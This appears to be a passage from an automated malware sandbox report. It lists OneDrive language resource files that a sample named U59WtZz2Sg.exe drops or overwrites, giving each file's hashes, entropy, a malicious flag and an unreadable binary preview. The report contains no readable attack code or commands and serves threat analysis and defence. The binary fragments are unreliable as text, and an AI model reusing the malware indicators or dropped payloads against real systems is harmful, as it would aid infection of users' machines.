Preview:	MZ...U0`..N...U.Q.Y.P...W.)....X..vsb.....x..I=...3.o.s.....z\|kf.A.2..d7.4_......\|...~..l.i.Gy...D..y........S......d..R.....h.bu.@..H..B.h#.w..$..mz.z....9...o.]....o..XF~..,.... ....g.;yN.^.i>5U.\#..h.T...].O.Q....s....#.wBWtG......wQ.U..1..U...(.Y.a..2.<.R..2..UY..6..62..).........yd3%U4..0.)[%..aZc... ....^.QY.T{.X%U..(...g..=......?l.5.....l.....g..V@.V.b..\|a6.F.##1.. .yo.B.})........BV..k.e..#....+.....sw'...SOH/..h..2.Q....g...$..^...?.[..H..'l..8...0E..}.s..$..y.V....LPZ.../...".?i.2....I~...c..j.....@,V.:u.~6]S"7.<.OG.>....w\|.4y...I.J..B..M......K...9N..4J..1J.i.......I...M../^.....Q.}$...w.Q...!m..k.g?...=....c.\(&.DH...a...}....G<..b..J..}.N...`..].G...T^c.W..y..A.=....`..t9.?,{l.kz...?..W .."....Ooc`vw..{%...\|._..G]xq_F...1^%Gu......~.C........S.w...}.\..i!.........o.../.}.......O.Q.b..2..k.v..'K.wU.........2.7..v.&.~..^.{1/M....H..IaP..$..Qhj.hx@.y.#.......l.\|.{....j..3.....{."...Ge/... ..`......I....j.....@..T.1I.c.31@..Z.B.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\de\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	228486
Entropy (8bit):	7.357164353451243
Encrypted:	false
SSDEEP:	3072:KJJ3Gqct+R/bglx+e1x9Gz3bHjJ9c5+Wt1ul72Npd1vZsMttk8mU4EDGKDneAIy9:KLR0lJMjJ9lWt1A7QpdMMttk8mU4Ed
MD5:	19F16D18E1B1D7BF431F605BC3322F31
SHA1:	2F659AAF637CD20D591DDA09DFCE2A0F412E5D5A
SHA-256:	1B58028A13C64AE92B2461BE2B64261A07EC46F4610A08DC17182A793B68C27F
SHA-512:	6244A48F98FB6FA4AC686081C9736E9C387E2A551F834FA2FAFEC5420068C757B7146988E91523B57F5ABE210E1427DAE1F670F9C6A8F43051866E8C88AD93B5
Malicious:	false
Reputation:	unknown
Preview:	MZ.......p....K.5x~..`..S......\.^y..%m.c"hc?..IMgH.\K......;.#.q....CL..g`f...r.'@M;.Ngk]..)W...-E..P..<...a..J..x.../.I........E../O..;&).a[t...:$.&..CU..%A.S.p....&w..q..[.Y....-L............H~...`...+.P.B.(#r.-=J.2-..i;.T.....p(..U.LE.V....!..I...L..O.3=.0L...BWM..H...ICd......P...fq.~.B..BS.......85..3.."0~..)....3...Q...zLC...?i.1....z5!.B."5.......oS.......W..<;./n..gHql.....Mv.p...Q.#.@3....oqG..:cq....M..\_....P-=.i...pgBeZ$.....{. ..B..............C.v..xx......9...-.AO.Q.H.\.Y.#..@....}x...(a...n......e.....2n.....W.....~'..V..#\|..?.,n?.K#\|...ua.6.._>../0..r..`Iv.R.b.......`.......m:.'..8..a8.G.n..D.....5D.........+..?........@.t.>..P.N.%.....?.#...k.PT.........p ............Y.."L...e+Q.-..V........'.W<.L.I...?....p..n..."l..3........7....V........h^.<.... @9.K>.a.\.o.c...{.Ql.v........qvV.IO....U.....):.....{..{.$.8..../3...+.Nq`.V+......(r....i;.0h.....2...,..<E..m..VP.b.......$G......D.c....*.pf..q.....w..d..!Jc^...Q.-.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\el\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	232094
Entropy (8bit):	7.460493250037043
Encrypted:	false
SSDEEP:	6144:MZDezZFYjwFjsafmMBv5jZx6pJPn3VYb/wmg1P:2Dev6wFAWlBv5j/6nPnB
MD5:	3E08B8602C19A3CBF8286589A61353B4
SHA1:	323732298C5C481CCAFA590BB6C95D88F959E992
SHA-256:	9CFF5C351F847196E310757C576EE64121122CB6B357588A48A26367F5E7FE58
SHA-512:	23533063202CBD4E640C254AB70A49133BB14F45B098013BB98B288476EE0AAF6041CD083EAB1C95CE3C09C4C0E903EB6EE6F2FEA0D51690A65A55017E5B799A
Malicious:	false
Reputation:	unknown
Preview:	MZ........Zi..F..9...84w.[eJd98...a.4AL./.5xD...!l.&N.=.Wy..h..........9.a..~.....:]..x...5\#8.n....J?...D..2...lc=]..N=..Ak.Rb.C....!.u.F.L..X..G+..I...R..~......\|.].{q....... ..r..A..p...F.0.@.Z..UU.....1.......=.L........}M..!}V..i...?,%o..Z?Q .aq.W}..\...&..,.W~...?Z..H..f........Qt.}-E...p...]f..p.J.&.@......K..+t.-fg.}@?8.cD......$.9.-..T.L"C!.I.Ns...8EY..6Sby...Y.......<..#...D.....~r.{.....r.5.'%<n.,.....>.e../.W...h........3B..+..2.S.7..'}....D+H........n.E./.~.L.....1..\|...[..y..j....X........"....Os[.K.....u)".?xT....~.f.].R@.C..a...7.O.....^.......'..nX[..o..F.,DjZ....[....jq..`.......jay.....VC,7.x.\.C\|.C..&..TG.t>..I.....V.5.....V..P.......t......j6G..S...7LR.._....r......O..xm%x.e......<,..W=K.wP.....!.uL....xo.P....p..O......}1..y.g..-"nk.!....FU..o..s..WT5..7R.(...^..Po,X.0u.N#4gz..=@........D.C...wW..vr..s%bZ.........w..~..:.<.%.X.......%.......yg.U....~.,.W...q....0Xm....F....e......LQ...N....f...3~..%.w..q..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-GB\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	180358
Entropy (8bit):	7.91324905913
Encrypted:	false
SSDEEP:	3072:zyRcAqydNwTdECqlLvlsManVv7P6hgve7NmKhx7qyQ0L6hshLIyqBz4YGX:xApNEdEPLkyhbNmeeyQukEqBO
MD5:	49FBD15FF833DB8AA54C18683416CD21
SHA1:	7FAFE7DAB6D0E5EB7AD70CE66E5EA41F66DF4B0A
SHA-256:	BBBA0DB4A6D7EE75312A0E7381224B3141705D5F8076012047E55B929CC59187
SHA-512:	D29A2B2ED8832FE595890125C891320A011A2F2BA7DF8BABF3DD5C003FF63FDE599F2813CBA66A57FB0A49916FAFC9A682961BCECFFE88EEF0720AA550F9E9EE
Malicious:	false
Reputation:	unknown
Preview:	MZ...$>.Q...71$Y.l.z..0..o5.>4....2M6s.....:.............xw.._@.j.q.j.c.Bk.y.=)....$A...0....v...X<.y...H6ow.x,...[.....}..N..yT..=9.^...`m..(..3.....wv W[,CeC,_J.Z...3.....1X..=..<Yg"..y:l.X~9...4.....-X..rZ.......U.i.L.p.Q.I....jl...8.Y..Ed&...3...-j.@...G".....7N...\|.......6..6?....D.+....+.2{3]Q.f...T.^.R........[....8.D....#...1'9..ow<.......././...A.j\.'.....!.d.8.........N._M..,....v...x....3.D......[.......B..`.-+..1.&.;.c..S+.4..WW&s=U0....:\.......E.@Z..x..8...Yb......Dq[p.=.r..1....f.OkkXq..J%C0...z.....4Hz..l..x.L.P...l...l.....[i51p{.rH....@..I....)lM=#5E...U.e[..d...y..?.w!.....fc-..4.0..{.....*@.=/......t-%..qUs.'L=2..[..,...an}..1.....S.b..2q..r3 V.8.E.~..g.@....;...V...s.h:....r..~.3.A@.;:If....r_...v.w1....,..\|..{.....@aI;8V...48.dD..2.....Vt......J.....t...6.....)Di......D.>..RY].l...U\..<.64.A^T....LT-.OlPI.)N.;.%.1..xB.Rdj.....J.2..Y..g.~..... B........~<...~I.......U/n.....Z..uX .g.:Es.;..EAE!..u...S.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en-US\msipc.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	42406
Entropy (8bit):	7.995865368903253
Encrypted:	true
SSDEEP:	768:4j6XsfpTh9y3QXMNvNq/TxudlmET0Vl9aqKzD2eGveombgk85UmI8lWt9:4j6XkpTHy3Qq9TS9TO20MkvMWj
MD5:	289F81FD2061DB0EFAAB7D6E3EFB867F
SHA1:	77D5D17F778ACD99C3837E24613171BEB2D3F12C
SHA-256:	D7504BFF0CF854B34FCD3666FE51F17A57FB03CC8E62D6C526861C967A6C7E1C
SHA-512:	59C701EAADFB113322819A5DC6BC98202007EEE168FC1C3A3CC8C47C5A6EFB00045DBE0E462D66F30941B0A55B028D8BCE271225A34CD799DF28BD07DBC0B755
Malicious:	true
Reputation:	unknown
Preview:	MZ.........8....$(..q....H`...m......?..e..3X.x3.}W.Lh..O.0..i.l.s.u.(..{1......z.m.l8%...za...8.r...D...N....;.rJp,.kE..VW.n.....a.d/>\..X..:.;.....`!M.....5@<.FZy.L}....:.&....f...e.(.S............5.~.MX.h..d[....+..>...C.sH..4.<.!..V...z~..+..7......J._.!....^.bo.p. {...7....$P.L.T.K...\..4..5....3....9.n.O.05Z....O..c0d(cN.b....o..GO}...$.2..]@l....B..,....f.$-....+..a..... Dck...............0dNz......_]$...O.......y...-aG...1p.......W7....S.O.m.~....3.V..i......,:>..v.1.=~.1.1AB..^R;66./\.....%/...9..a..y3..-.....a`...\|.&l>.D...W.bo.a.9.0.H%w.2h.T.....M(..g.._..7`tw.>0..8.q.].P...u....".uW..=.........$.~.r..o+8...%.8r.......+&ah..d.i..K...H.xb....IZ....kA5T8X..m.S.4.Fb.T....X...p.$I...d..,..o;<..t.</w...v. .vq!=...9..w.g..+.......B......g....4..V......Gn......T.*.\|..)...J..k.........r.9.#k..=.?.....7.X..!....I1c...;#.m.D9.5.J..~.\|d..Jx...1wYo.....%<.fF....K..X2......f......G..Y<.>..!.....K....k.6..~....o..3Tv..8..1...]&gP...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\en\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	179630
Entropy (8bit):	7.918982962894179
Encrypted:	false
SSDEEP:	3072:zdHvFIRmhRVsRLFMBNJsTVvUV09Eo+Alaamf3jMHKWy9pn3qGSgfdIRAM:1FIRmhRAVDaPjgLMpn3qvgfdzM
MD5:	E6620B6EF302224BDBD78D88E538AB70
SHA1:	6DBE0BD1F6D5E53894BB115379C33F029A5F5D5D
SHA-256:	BB225433DADE0DC6717228868515C5FAC5228F34C3DA34B7582E0F96D04AF964
SHA-512:	C5D867DA7B60AA411DA2C0BEBCB420DBBEEE629FE1BE8B68FA2E32AD4F34B0785F203538BB7BA53802857A93084B0DFFB347AE00047BEDE963C3E72DC33B91F2
Malicious:	false
Reputation:	unknown
Preview:	MZ.....&b(..t...k.e........T....A..n.........._...<.g.....N..>A..I.....y....$.......3.......rsU...gT$......B..Y.x.P.......Ql._.%.Q..@....5q.F&...2.:.\|.k.m.;X.7.sm.._$...N!......(z...fw[..O.........QB...cR... .......a..<F.r.^P.Gj ..t]Sp?...M..}.{..._.?(.:..7..2.......$.N.G.5...mi.I..K........yv.N.T.G..g4....~.....p<..5Ao..B4.o....]+.6".....\|0r.${%1..<....(...4.q...o.....H`.Uw.....#...m..i..G.D.....84......._.&a.H.......{6..%.f...\|.I..I....Z.x..Q,W....j...@....-......O{.....&&..~.a.#....t.?..5Q.cOY.A.X.2S.....+....d."..CZt.bR.\|...zi..O.*...GJ..%o.C.ETp..FQ...C<bg/...j.h...!.....o6....PO...q..m....fE..s.[:!{@...Zc..g.Q$n7.....Y.....k.+^i.P.......[..P..".f...........n9.Uo......S.4.c...H....{...O..5&.p..j...$........)..1.a1m].29......O2...w].f...}6.yzK~.X.9I\|0G...;..._@.$..6-}!.P.@dr....N4.g..c.4.$W].~....#z#.Gx.. ..f...2... u....7.O.y.R$..._......t....G.B....C...Z6n.7..'.v...j...y..;I..N+....@g...3i.r......J.L.#qU}.MF

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\es\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	212910
Entropy (8bit):	7.536461386246161
Encrypted:	false
SSDEEP:	6144:fXwKpFaS1ZutAg2376WsCYA/3vMjoXjru:4EFaS1Zut4uqu
MD5:	7DED61964F2147B519B84AB4FD5C28A3
SHA1:	3667CA070229265A5D047A65E6DED0E6A2D3EC2F
SHA-256:	C6DE63E5C8B4721B98D52CCFE44B123394B99CCB7E0234A962698F099B4B9B0B
SHA-512:	2DBBA00274E8CE42528353198FBFE7D778FF5BF47C545E08088D3ED0A015BD9608D89431397C5D1C0D14061DBF3F6FC91D5C91AFD3B7A60A0C1768A0B38F980D
Malicious:	false
Reputation:	unknown
Preview:	MZ...]....&..B.s.S.O...WV8..O...........g........{...8.W........^.6..B...v..H.d}hL..[.....xB......^.>.......GB........8....H.e.....hdf.)T..3..p.B..a.$4..?..?xF..DG.\.sY..]g.x^D........M.w.e~.,a.H....O ..I.cQ.1.n...8...Y.d..C..(.a5..`.;.I...oC.i.c.0......\|..z...Y._a....&.D..\.. .!./....'...3H...J...?.No.B.Z.......0m.BE...q..hf..^......{.it...x.7.;..3E..K..F?f..101<.[.......\|G^/.....u.y8c.gi..J0.....\|....4.3O...`D...qK..JK.b,.(c.L.91...8.........p[.8...1..4v...{3l......5~;..Z.X......b.a.K<.m......A2a-.5....3....z...LG.&.8..v..A'.f.h....&.zV..F~.44.t]x.Zq.8u.O..._..^s:Y./.0[B.^A..'pC..<..?....y{XN/..{.@K...d......t..1t.>...G....F..5I...h..).......GG..Q..z..mq... .+..V...v..$4.,;5.#v..u....:c............H..o.........E..p..@o..A.ZWCC$F J%....\|.2K.Z..=...S...B..>....F.Y..:...)...i.X.3.....>.'.w...?..=6.l......../\6;m...~..X...Q.Y\|..!....%#"...}I.?.m.. P....4..z..X+..P...t..yB.*vA:..'...;.'.Z..!../#6..5.r.[H,...v..PG.....1.X.C.l7.K..-.m;I.Yi..~.B..f

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\et\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	192942
Entropy (8bit):	7.7702152418361035
Encrypted:	false
SSDEEP:	3072:7M4RpDs4/+tRB1JSJjWOxIbveCjD6SUini81V5d5Zq1OC1XB2HCbQHvt:7MKpbm91AJdkvemnfB5Z0OCz2Tt
MD5:	B8BDB63206353FEA9C42361052CF4F3E
SHA1:	7776A7490E8689819AA3DA89564ED34BDD1D13E9
SHA-256:	3F62BFB3A657EFF21B80E4FABAB44D30EB1E942A472E88AE3E976432F04774BE
SHA-512:	67CC57F07A71B2B9638674763811DC44D1548F44843D7757715730675A6915EC65286FA15489AB02CE7681BA1984858CA2725411E3F90E27163993E1C3AF1D8C
Malicious:	false
Reputation:	unknown
Preview:	MZ....A[./.}.....<O.[u:7...6..[.}...`.r..z...[....ecxj.z...Q...43.~.V...{....$..K.v.^.....,.'.x...1.w.n5........s.s. .;g...B..0.c.NLx`........76.Q._..`.7..t....\|X.:.V5.Kbz.ao.^.S..~G..DW.Ar.GC:....Fy.g.....4i.(.=u..s.oK.~SP.Z.......W..$....Dd..(t)R.`d.By...K.o. ..9...(.......<..T....wq.,\7..(..0yv.B......B.3...G6....nO.....2......Q.\|.^.....h._w...9..mX5...2..I..b..{.....='uH...yN.6..Jo3....x.N.....R=..."fX..8.P....N4.OS>...E..Qv.AM...x.H......5.&.p..3..U`j.f....hE.#...N..n.AuC.@[..o4@.j..~..Hk.E...z&E.GY..=.......0....XymZ..Q..@cY./MF.j.x.f.....H+g.6.C....c"...."N<bU...=.....9m....A6.3....Lg.h.X'.....+...C.i....1...v..f#nn(..K.....\|6)M..J?....X..$.....a.aj.=J..S.x{<.D....$M......;. .....&o8....C..H..>L.V....F%ZA.....9.=.%.E..Sc.Ii..[..:..~s.!...C...dg....x1xcG.8.....+U.9.F..N..Xz..g.....CR..ZK.%.=.^......X.?.3..E.a.x.7..............Y.y...<L.\...+/t.SH....Cd.[..>..l.5x&.:^..P...>EL#.uF..4^..V>.......8E..`6........=...........}G0.:...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\eu\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	205230
Entropy (8bit):	7.626069893557678
Encrypted:	false
SSDEEP:	3072:MwoPWstd4ivErfh+F7oqHUjBO+QYA5i/t0Eiq8U361Jt0/mu+gnPY3:ipaA6ykq0j/lt/t0EuU3cn0iMY3
MD5:	9314E93D22829C852E9C1D738923F2A2
SHA1:	2DB833410BB901FBDE11D7FDAE436432FAAC1212
SHA-256:	FB6DD3B870A58B4EE97473B4F6A4855DA8824E9576B4F2CA76D3D12BEA52CAEB
SHA-512:	0C795B6D288D4C7DA6B477DABB6253F836C2E7A82766D1ACF42CB1725CDC1015E17F9C05A369FD07A2E9A60846D42CB7F8DA05375552079B2A5A91D5C284AC44
Malicious:	false
Reputation:	unknown
Preview:	MZ....<....g......J~..h...]....R..)'o.m.o..{cD..t..p5...>..W...Y(!i..i:....4...r<y~....?~...d....... ...d3.5.....D...)....l2>i..x.Z.o.Xx r......t.....<.sB.......N.;..i.^.yq.e`.6!k..].G...v......\O.`....$S.........+.dd...:...K;R.:.RT..e.<...O.f...B..Qgmm.-...$....\|..7..x_...>......2]....Sh.Z.TP....C.f.m.....:[.+.g&J..g#.v..a..}f`Zt..........qq;...[. ~.q.7X.H.\|..,(.....7...........z........+..C..mV!.pq.UD.c.v.p....s;...+..g./.b..h..Ox.n.u6J.......n.-+..g.L...o.A(9...TZ\&H...,.^.....J...A..q<>..a.#.9...a.`...u.mmx.l6'g...v.........".R......fL......6T.1.'x..;.Z....R..jG.{b).L!E`_..BCcA..._%@..Z.@.km+...^....}=....z..X........4I...p=.F...jG.....L.1.xD..?..<E.W4.]D..[..........I..f.}.7.k..Z....mQ.I.}6.#t.._..@.x..R]....A...k.....3*E..'.a...E...uk.h7....D..,pKY.>f....'...l]..........s?.......rPD8.[...]...N.4:Q..W.;..L..1....3.....O}..Z...d!.l.,.K.w.g.....bwj\.d..p..p?....k.7..HO.Ev.F>.k.&f7.].S...o.Z:....>.[..i.li!..i..m...~;a...j#.K..jp..w.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fa\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	198270
Entropy (8bit):	7.770709396766746
Encrypted:	false
SSDEEP:	3072:RV65+FT4asutckoEnOq55NvgKTAVVIuoXlqtLjExuBBE1SR6kGKOuATN:Rm+FT43utmq55NvtAIXuExuvE1SIFK+
MD5:	EB9CEF55BB0B36C7EBEEDCF54F0FA774
SHA1:	998C6F3A2A6569EE834195B3CF616317064C9808
SHA-256:	D5FF1BBF9A77DD0222F128C1439EFBA8771DF26EFCE95123E958C72189857D42
SHA-512:	4908D796609B0E575A76BF8AA923E8EAE4A651CAD268D7B33959C49CC931493E5C211DFA547BB5C39C30BD4E2FD1275902F2AD1F6CBBB67D4E13A5CE1D2479E3
Malicious:	false
Reputation:	unknown
Preview:	MZ...._...!6.F..c.4n..7y...{...l.v.4XP....S]M ........q\..........U........(...>.Zm.....-..7l..o1..m..F.....{_.(T..L.<...nO..0l.K.......G..FHM.....a..'......y.C.J\|...n..A-4>...P..#.+....dQ..';..5.....$@.P....r...<.........C1H....X..i.&!.3.(Aj..(d?l#.99......rn.k.E...g.j....$k.b........-4E..a....]...YG.v.i.......U#......tE\..[.~.x..r-...^.o..%wX..v%...v/D.e...R...K..-..u..Kt..=...(......q.f.....~...O..&.Fa..].%....+..'l..&.i...L=.=.!...tt.a.%.Z.......~nh..H.L.+...ig5........\....6.D.U.....Zb........&.8o......R..Q.z...\|.N....`.rg...>..j.M?..$.q...v.....G...y\.....V.km..b.+....a!.L..}F...0./.d...[.Q..&.\.t.}...;../.Z'J.qEU.=./ N...........1X....._.z.=k....h.m......$J....K.\.s:F.+\|.e..b.W.... ..A..(.-%.Vg0. ..E...I$2...`3.C..-).V.?.....P.x-.8H......4Xl(.c..A...'..[......d-N~yZ.h..'..:..m'+5Y...e.m.x....N.^.5....{.u.h.l.R..}Qi....X8..@..e..np....F.8b..../.\..Sd..C..d.&...S...Bt{..o..=....@).lP.....gd......C.k...j..k.sfMgE<...\

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fi\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable, MZ for MS-DOS
Category:	dropped
Size (bytes):	198782
Entropy (8bit):	7.703561021565894
Encrypted:	false
SSDEEP:	3072:k88hhhiKx/8p63rKypziDECMR+4BbuztONNqpyU2YPv95VlrHtzlciC1t/ny6:kxhhhz/263OozyaZBizkTqpZNtpzcdp
MD5:	DB1BFB066527B0638E607047A7FC3884
SHA1:	DEF2AB8DB019EF015AA81330F8A3856D11719C3C
SHA-256:	002A5417FE9DBF7512800FAE296334ABBF7293D5A8C268442AD8C9C7A0E6F7C2
SHA-512:	312E8AB7B69DF387799ADD2AD4F2C8497CF57DB8D0BF0C45FC11BDD2084203DF991E0693F30134F5FEAC02C832192B12E32A0DBA081165350AB13D915A64904E
Malicious:	false
Reputation:	unknown
Preview:	MZ...`.?..p.....^.......jl.=..d..u..1../..K.>......]..9g(.~84S......rg!.].2.z.^....(.AI.>....X......j:^G~.M.}T.....q..^63:..U..Xm...[.m...K.TR)ma'!.1.0.5..o^..+..@a/...N.......^X.....'.Y...s..'h.a&.....I3(.m../3..u.......!#.."5...i...W$D...q[./)5.Z....M4........D..s..L...i.....s.+#}....OI..=.......Y...v.>...J:k.M...u.e..;hnE......nN{...lY....../.L'..`....p`.+.J:.x...8Y..x.#.{.]...'...Y......4.c4.. b..@.........Y.~..d..oF..%....\|KO...t2.T....V(.......{..~.l....$.yM..ze\..#.<.............^\|.).&B.7.L:......-b..?K...:g.S.........)Q`...H%..P..h.\K<.F..5C......N.i0.9L..!.$v....+.YH.n?.:.;..9_..^.h......#."J...........FB..~O..p.x.iI....z.. ..;.5G.M(......W..h.K......-#NgKCl.g.R@TN....n.{..z.QG..zD.U.L.a....E..R..*..$..0.O....b.._..%.:w..$>..?..;._...w......d..@.......E.,e.Ew...B....0B^..f.k~....7..NP..n5.f&U.:...k...W....9....Y...}.....c]~6.."...G1...=...O.by..B.... ..@..l...c.......(n..7..s...L.]............%...o..zn...O.w._h

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fil-PH\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	220798
Entropy (8bit):	7.437462258075412
Encrypted:	false
SSDEEP:	3072:A6cW+ZgO+cwf68GbGqAGl1+QbssI95BRE/cY5rs924wMQvHK3F8r0a5NqNgqNSA0:8u3rGbGls1eJEBB15OnfPqoe
MD5:	2FA6E9045E80C06A471E668C17D2A42E
SHA1:	DBA37FC6AF19640AF8DEB55E0CB6C4963008E486
SHA-256:	3779A89D651291C492E8B8A4C93DA20212F39E5D0883E1A4E4303F2B77E8F9A2
SHA-512:	DEDAED1052CDA03A1D71F0001FE3E6744266741F0FDAE6E73E50CAF974572AFB9F365D25054A92AD493FD38B9C3B4E636E0CC82F41F08814E24690646806BD14
Malicious:	false
Reputation:	unknown
Preview:	MZ...B..t...../.8`.@.....Qk.t..Ugd...@......U..r...xv....>2.I..IL.L...!.......]/}...K,.K.....dq.).!..Z.]....R.9.3.I..1.U..x..!.6...R(.p.l4\|...U._....A..>.....?p.m..x.Y....<Mfb....#......C.J..Vz.x...I;H.....w.ILn.X. ....m..\.9Ln'...C0.~yw...Im......cv..W.a.`.]>./..}.2....V.[.bs.VR..%..L..........wb:.I.m..bh...lI.c.."....l,2....7.\|.].Q....L.........w\C)..s......bM.sO......R.....w.k/E..%..I.hy...:..@.1.....N..Z...?...I.@$....(.4BR...rN..`.q..B.....!..LXVs*.I3.g.2.R...l.9d2.J`5k.HbW.......\|.jR./F../..o..B.x\.%M..^.. ...w......x.~.ib.9.8.D.J.P......Wm...:9...0...E..Q...y...,....coj.7..w].xW..%oC. .#..G..FtR.x...1.t71ei.vX.sU.?..U.0..@`....n..G.9.m.I...n.c..$U.W..g^......h.E....lM.R+...h).].q.....h...}2I._".....{.....%H..u2..i.0p5.....h..G.p...lt$c......?&.1.O`! 3y.......d.PaH.).y.K.......L.I....>7.z.y.u..OI.8b.D.x......H.mm.QZ...r.I.......K.9Vn.g...^...^..C_2.y.R....A.$.G........e....>H.i.g.,.W....HY...K..$X>...8Y5..p...Y..Rd..2..,.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\fr\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	226950
Entropy (8bit):	7.379443569024872
Encrypted:	false
SSDEEP:	6144:HROAATrtw95TfXZvg3if+ZZP0Dvsle41th3BIgvebp:Bqw5Tfxeif+/0DvslB/3BIhbp
MD5:	F28174C15ED81C9B639E38A77912C405
SHA1:	73E1A20DB7AFBC30A51C0DA5E888E23C2F575CC1
SHA-256:	A487998EC811B332FAFFC4C2BA572F18E6BA27D921A4E93FCB4D8CCC85AFB0C4
SHA-512:	4774CB9DA3FEFA38629E961E08B04BE5BBDC59B6A474CE08336AD3954D4B8639037610B2D13CDBBB40168D3462802EEE0749FB613234BB176C8BCB60AFC712CB
Malicious:	false
Reputation:	unknown
Preview:	MZ.........;.M.I....:.>M......}.X.l~.@..)...m...Ro.)..6.....D.U%..4.PB..>q.P...].p....a....+..4..6.}..r.D{...1.(}$]. .\.y.&*n.0....c.1)...1...h[..XD..J6.t.#...=..V>.,..#a@.]...Z.h.}.?.l.i...s....hW.....n.p.:.M..r......v....n.s.M..Z.`..c8$..Al.5.,.q.X..[.P.....SWX...B..gH........C....R3..T.(...Cj"S.$..c\|....j0...s`..!0...8....]H..T...sP9....3..D..B.....t#n.+.f..F....I^@..e...b.P.El"....g....Yn@..3<.=..[...........}...U....86..:M...ZK.r.....4\|..@f"...R,J.!....3..n,2...]7pD.M....>...v.....w{T.Y......}..W.Nd.J.^A.....>...F}J.{.x.....6&x.bH.Wo......ux..=..%6...G..I..V..8..fm.._.t.c.............H.....L..3.L.....+o...N.=.z...p..#^.uo.............8.i.b...rM.p..<r>7dN."...9.....y.Ah.i./....S+0........xd_PQ..f3z..W...%SmX....K.pu..E.".ra..]..%.t=.h..........7."....HFM..........L....n^k.mS...n..Yw+.7K...jSBQ........@. ^...q..q...>l.4...$n.D.T.c[...7zs.:c....../.s!J....F.+.u~...:j.%h...v.......q.v.(.K.czU....^....1...ju....L...>...1....N.]...2.x?.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\ga-IE\FileSync.LocalizedResources.dll.mui

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	MS-DOS executable
Category:	dropped
Size (bytes):	211886
Entropy (8bit):	7.549122099682642
Encrypted:	false
SSDEEP:	3072:fzW1kfD49N+wRb9j8eQm+Aba+P3tXzytuMv5H7UHzuxjcZkdZ8J9d:7akfk9N+wRb9j8ItlIumGTuVUJd
MD5:	6CB6A26B2CEDFDEDC3DD6529C5F5BB39
SHA1:	5DB2CB3B55A5AF6F88A92CB44087320C5EFD4788
SHA-256:	871AD3A1450C8C4E91A7465C6140EDA5051A09FEF1AA6EDC7FBBF58278910477
SHA-512:	66351AF50CC2FA072CF7D72B535006D16A115EC6BB79E7B404F6BE53ECC92075F8D96A0DF8359082C953786123859FAD97B9E101B6D04028B11AC4996D87E814
Malicious:	false
Reputation:	unknown
Preview:	MZ....yJ.._.....x....ND..)(...K.wp%'L.A.....S....r..?N..,.. ..L.}G.k\|..@:.....Z..P..1].....D..U%r]..c.....l''....R..-....DTM.'..(L.4..y.F.p..z.i7.H.H....G.............-.!%K".Bz...MTe.t,d.`..3.~...0..RL.3...`{....>v..]E~$.......h......0,.....@...p.=."..B..O.i..,Z:.........;\|G.y.].<.}..\..Y..YM.5.$/Z......l.Q%b.!D...=......O...P.sG..8H1Z.0.YE.?3p(sPr.8Z:...@.#T4.D.`?.,.....m.<y...xZ.eo...._..,D.D.N..t.AL.f.7...}.R..........>..f:`.c33.bn.y.....k....>._!.......\|..f.Fp......x.r.(t..P...3.R.w.(.v......m%....k..fh..L.......f..\"...m.....j5.'H.+..V;=..F..6....za<.Jh..t..\C.i*.....+c.^...MIk.......c......N!.:....t...m_%.:.]N..I?..W[QW$.....@.[.]..U..`~...D.5..Y.M..A..l..u.1Q.U...'..2..m..:(.1d.9M...3v:...(...:.XB6..D.+.y...v.......Nlww..&..u...%..o....[Z.,.i..\.@k./K...:.E.T3.>..\5...k.....y:..H.y$3...<?..u..sW.,..&:.....f..i.....7....x...Bdl....u...&. .M.`..........A.ad#.r].\l.....UK8S.:..f{..t.V.._...,Dq...C.....x..J.d.W;'...e>.oo.O.5 .. .o.0!.4W.q..../{.%k.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\gd\FileSync.LocalizedResources.dll.mui

Download File

